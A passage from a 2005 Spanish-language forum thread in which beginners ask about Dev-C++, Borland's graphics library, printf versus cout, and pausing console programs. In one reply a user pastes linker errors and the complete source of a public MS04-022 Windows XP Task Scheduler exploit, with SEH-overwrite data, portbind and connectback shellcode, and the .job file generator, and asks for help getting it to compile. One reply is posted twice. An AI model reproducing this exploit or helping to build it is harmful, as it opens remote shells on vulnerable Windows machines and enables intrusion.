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Autor Tema: Novato en C y Dev-c++  (Leído 104,350 veces)
Pseudoroot


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Re: Novato en C y Dev-c++
« Respuesta #20 en: 13 Mayo 2005, 02:59 am »

hasta donde yo  tengo entendido en  Dev C++..se puede programar graficos. seleccionando unos formularios diferentes a winmain y/o modo consola, sino como openGL oalgo parecido.


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zheo


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Re: Novato en C y Dev-c++
« Respuesta #21 en: 15 Mayo 2005, 01:19 am »

Hola Saludos a todos
Soy nuevo en este foro
Pues a leerse las normas de publicar código anda.

La respuesta es que graphics es una biblioteca sólo de Borland, y no es estándar.


En línea

Sólo hay 10 tipos de personas: las que saben binario y las que no.

¿Quieres programar un videojuego? Si quieres unirte pulsa aqui
edipo

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Re: Novato en C y Dev-c++
« Respuesta #22 en: 18 Mayo 2005, 19:46 pm »

a todos yo tambien e querido compilar en devc++ y me da ciertos errores como en ejemplo

C:\DEV-C_~1\Bin\ld.exe: warning: cannot find entry symbol _WinMainCRTStartup; defaulting to 00401000
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `usage':
//c/dev-c_~1/include/objc/ms0402~1.c:233: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:234: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:235: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:236: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:237: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:238: undefined reference to `exit'
C:\DOCUME~1\ESTACI~1\CONFIG~1\Temp\ccE1caaa.o: In function `main':
//c/dev-c_~1/include/objc/ms0402~1.c:243: undefined reference to `__main'
//c/dev-c_~1/include/objc/ms0402~1.c:249: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:250: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:254: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:257: undefined reference to `fopen'
//c/dev-c_~1/include/objc/ms0402~1.c:259: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:260: undefined reference to `exit'
//c/dev-c_~1/include/objc/ms0402~1.c:264: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:265: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:267: undefined reference to `atoi'
//c/dev-c_~1/include/objc/ms0402~1.c:268: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:270: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:271: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:272: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:273: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:274: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:279: undefined reference to `inet_addr@4'
//c/dev-c_~1/include/objc/ms0402~1.c:281: undefined reference to `htons@4'
//c/dev-c_~1/include/objc/ms0402~1.c:282: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:283: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:284: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:285: undefined reference to `fseek'
//c/dev-c_~1/include/objc/ms0402~1.c:290: undefined reference to `printf'
//c/dev-c_~1/include/objc/ms0402~1.c:291: undefined reference to `fwrite'
//c/dev-c_~1/include/objc/ms0402~1.c:292: undefined reference to `fclose'

entonces que si el exploit es este
[td][/td]/* HOD-ms04022-task-expl.c:
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* Exploit version 0.1 coded by
*
*
*                 .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* Tested on:
*    - Internet Explorer 6.0 (SP1) (iexplore.exe)
*    - Explorer (explorer.exe)
*    - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
*    Win32/VC++  : cl HOD-ms04022-task-expl.c
*    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
*    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
*   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
*   Shellcode:
*        1 - Portbind shellcode
*        2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
*
  • Shellcode: Portbind, port = 7777
*
  • Generate file: expl.job
*
* C:\>
*
* start IE -> C:\
*
* C:\>telnet localhost 7777
* Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
* (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
*
* C:\Documents and Settings\v.X\ ¡®ç¨© á⮫>
*
* -------------------------------------------------------------------
*
*   This is provided as proof-of-concept code only for educational
*   purposes and testing by authorized individuals with permission to
*   do so.
*
*/

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include "winsock.h"
#ifdef _WIN32
#pragma comment(lib,"ws2_32")


#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif



unsigned char jobfile[] =

/* job header */
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
"\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00"

/* length */
"\x11\x11"

/* garbage C:\... */
/* unicode */
"\x43\x00\x3A\x00\x5C\x00\x61\x00"
"\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"

"\x1E\x82\xDC\x77"

/* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
/* for Win2k use jmp ebx or call ebx  */

"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
"\x80\x31\x31\x80" /* generate exception */

"\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
"\x90\x90";



/* portbind shellcode */
unsigned char portbindsc[] =
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";



/* connectback shellcode */
unsigned char connectbacksc[] =
"\x90\x90"
"\x90\x90\xEB\x06" /* overwrite SEH-frame */
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
"\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
"\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
"\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
"\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
"\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
"\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
"\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
"\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
"\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
"\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
"\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
"\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
"\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
"\x77\x38\xff\x55\x20\xff\x55\x0c";



/* use this form
unsigned char sc[] =
"\x90\x90"
"\x90\x90\xEB\x06" - overwrite SEH-frame
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

"... code ...";
*/

unsigned char endofjob[] = "\x00\x00\x00\x00";

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+283+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog);
printf("\nShellcode:\n");
printf("      1 - Portbind shellcode\n");
printf("      2 - Connectback shellcode\n\n");
exit(0);
}

int
main(int argc, char **argv)
{
unsigned short strlen;
unsigned short port;
unsigned long ip, sc;
FILE *fp, *fp2;

printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

if (argc < 4) usage(argv[0]);

sc = atoi(argv[2]);
if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can\'t create file: %s\n", argv[1]);
exit(0);
}

/* header & garbage */
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fseek(fp, 39*16, SEEK_SET);

port = atoi(argv[3]);
printf("
  • Shellcode: ");
if (sc == 1) {
SET_PORTBIND_PORT(portbindsc, htons(port));
printf("Portbind, port = %u\n", port);
fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
}
else {
ip = inet_addr(argv[4]);
SET_CONNECTBACK_IP(connectbacksc, ip);
SET_CONNECTBACK_PORT(connectbacksc, htons(port));
printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
fwrite(endofjob, 1, 4, fp);
fseek(fp, 70, SEEK_SET);
/* calculate length (see header) */
strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
}

printf("
  • Generate file: %s\n", argv[1]);
fwrite(&strlen, 1, 2, fp);
fclose(fp);

return 0;
}
[td][/td]
porfavor ayudenme soy algo nuevo y e leido libros que siento que se me ba a estallar el cerebro gracias
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Re: Novato en C y Dev-c++
« Respuesta #23 en: 12 Junio 2005, 00:13 am »

Muy buenas, soy nuevo en este foro y me llamó la atención principalmente el tema de la programación en C++, actualmente estoy aprendiendo lo basico para empezar a programar en este lenguaje aunque creo que puedo ayudar un poquito.

#include <iostream.h>
#include <stdlib.h>
#include <graphics.h>
#include <conio.h>

Como han dicho por aqui, en vez de utilizar el printf o el scanf se podria usar perfectamente el cin y el cout además de que no harian falta tantos includes para una aplicación de consola. En todo caso propongo esta solución que aunque seguro no contempla todas las posibilidades es un buen comienzo.

Rectificadme si me equivoco.  :-[

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#include <iostream>
using namespace std;
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Pseudoroot


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Re: Novato en C y Dev-c++
« Respuesta #24 en: 12 Junio 2005, 00:46 am »

los  printf y  scanf se  itilizan mayormente en C. mientras que cin y count en C++, estos ultimos tienen  la ventaja que  no se necesita  ingresar el tipo de  dato que representaran a diferencia de printf y scanf..
« Última modificación: 12 Junio 2005, 00:51 am por [Pseudoroot] » En línea

jedi_shock47

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Re: Novato en C y Dev-c++
« Respuesta #25 en: 16 Junio 2005, 20:36 pm »

una preguntita? acado de instalar el DEV-C++ Echo porgrmas peor no se como los corro? como  los pongo ejecutables , como veo la salida?  como lo compilo ?
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Mi presente sera mi futuro  ! !
Pseudoroot


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Re: Novato en C y Dev-c++
« Respuesta #26 en: 2 Julio 2005, 22:47 pm »

solo te vas a archivo   proyecto.,, eliges el modo que deseas  consola . o ventana de windows..
agregas el codigo ,y luego te vas al menu para compilar ,si todo esta correcto no te saldran errores y ya podras convertirlo a ejecutable
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fell FX

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Re: Novato en C y Dev-c++
« Respuesta #27 en: 2 Agosto 2005, 23:25 pm »

bueno aunque el C\C++ es un lenguaje estandar
las librerias no lo son pues las de TurboC son de Turbo C y las del Dev son del DEV y ni conio ni graphics funcionan en el Dev

pues ti enes que manipular el link..

aohra si el compilador muestra tantos errores es probable que tu compilador no este bien instalado..
y si si estas utilizando C++ mejor usa cin y cout aunque genera un ejecutable mayor ..

y para crear un programa de consola es cuestionde :}

nuevo/proyecto'consola\

despues genera tu codigo y al final antes del return 0;

usa  System("pause") ó  cin.get();

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catp1710

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Re: Novato en C y Dev-c++
« Respuesta #28 en: 29 Noviembre 2005, 01:19 am »

ok acabo de revisar este codigo no soy muy bueno con c ni con c++ estoy comenzando asi q voy a ver q se puede hacer:

#include <stdio.h>

int main()
{
   char nombre[20];
   unsigned int edad=0;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad );

   return 0;
}

este es tu cogigo amigo CrAkEnçDeMoN yo hice una pequeña modificacion y coloqe el system pause y cambie otras cosas y funciona de igual manera aqui t dejo mi codigo:

#include <stdio.h>
#include <iostream.h>
int main()
{
   char nombre[20];
   int edad;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   printf( "\nHola %s. Tienes %d años.\n", nombre, edad );

  system("PAUSE");
    return 0;
}
 
 ok tengo una pregunta con respecto al segundo codigo estoy trabajando don dev c++ 4.9.9.2 y compili y el codigo y fino se ejecuta el codigo perfectamente, pero despues que me me da la respuesta y me dice "hola el ______ tienes ____ años" me aparece un titulo q dice presiona una tecla para continuar... y si pulso cualqier tecla me finaliza el programa hasta dond tenia entedido el system("pause"); es para para la ajecucion del codigo y no lo permite seguir ejecutando mas nada y si qito el return 0; pasa lo mismo para mi no es un error pero mi preguntita es porq finaliza la ejecucion del programita expliquenme por fa, y como hago para q la ejucacion solo finalice cuando pulse una tecla en especifico, es decir, que programe aun boton, cuando el usuario pulso por ejm la tecla numero 1 finalice el programa como lo puedo hacer y muchas gracias...
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Re: Novato en C y Dev-c++
« Respuesta #29 en: 29 Noviembre 2005, 01:21 am »

ok acabo de revisar este codigo no soy muy bueno con c ni con c++ estoy comenzando asi q voy a ver q se puede hacer:

#include <stdio.h>

int main()
{
   char nombre[20];
   unsigned int edad=0;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   fprintf( stdout, "\nHola %s. Tienes %d anyos.\n", nombre, edad );

   return 0;
}

este es tu cogigo amigo CrAkEnçDeMoN yo hice una pequeña modificacion y coloqe el system pause y cambie otras cosas y funciona de igual manera aqui t dejo mi codigo:

#include <stdio.h>
#include <iostream.h>
int main()
{
   char nombre[20];
   int edad;

   printf( "Escriba su nombre: " );
   scanf( "%s", nombre );
   printf( "Escriba su edad: " );
   scanf( "%u", &edad );

   printf( "\nHola %s. Tienes %d años.\n", nombre, edad );

  system("PAUSE");
    return 0;
}
 
 ok tengo una pregunta con respecto al segundo codigo estoy trabajando don dev c++ 4.9.9.2 y compili y el codigo y fino se ejecuta el codigo perfectamente, pero despues que me me da la respuesta y me dice "hola el ______ tienes ____ años" me aparece un titulo q dice presiona una tecla para continuar... y si pulso cualqier tecla me finaliza el programa hasta dond tenia entedido el system("pause"); es para para la ajecucion del codigo y no lo permite seguir ejecutando mas nada y si qito el return 0; pasa lo mismo para mi no es un error pero mi preguntita es porq finaliza la ejecucion del programita expliquenme por fa, y como hago para q la ejucacion solo finalice cuando pulse una tecla en especifico, es decir, que programe aun boton, cuando el usuario pulso por ejm la tecla numero 1 finalice el programa como lo puedo hacer y muchas gracias...
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